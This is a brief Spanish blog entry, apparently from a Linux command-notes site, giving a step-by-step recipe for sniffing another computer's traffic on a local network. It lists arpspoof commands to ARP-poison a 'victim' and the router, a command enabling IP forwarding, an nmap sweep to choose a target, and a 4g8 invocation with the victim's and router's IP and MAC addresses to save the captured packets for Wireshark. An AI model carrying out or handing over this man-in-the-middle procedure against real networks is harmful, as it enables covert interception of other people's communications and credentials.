V
e
r

l
i
s
t
a
d
o

tractatus@lapipaplena:/# _

 

4g8

Capturar paquetes de equipos de una red. Previamente preparar el equipo con los pasos previos para el envenenamiento arp lanzando en dos terminales y sin cerrarlas hasta terminar la captura:

# arpspoof -i eth0 -t 192.168.1.12 192.168.1.1
# arpspoof -i eth0 -t 192.168.1.1 192.168.1.12

El “12” el sniffado, el "1" el router y el -i … la red. El paquete que contiene arpspoof es dsniff. Activar forwarding para que los paquetes vayan a su verdadero dueño:

# echo 1 > /proc/sys/net/ipv4/ip_forward

Para conocer los parámetros [ips y MACs] que luego tendremos que entrar en 4g8 lanzar:

# nmap 192.168.1.0/24

Para conocer los equipos de la red. Una vez escogida la victima, lanzar 4g8:

# 4g8 -i eth0 -g 192.168.1.1 -G 64:69:0C:87:A8:DC -s 192.168.1.12 -S 00:19:01:54:F5:1F -w dump.pcap
-g (ip del router)
-G (MAC del router)
-s (ip de la victima)
-S (MAC de la victima)
-w (archivo donde guardar las capturas)

Para el análisis del archivo dump.pcap se puede usar wireshark entre otros.

Navegando por staredsi.eu aceptas las cookies que utilizamos en esta web. Más información: Ver política de cookies
[0] 0:bash*
1837 entradas - Acerca del Tractatus
La Pipa Plena 2018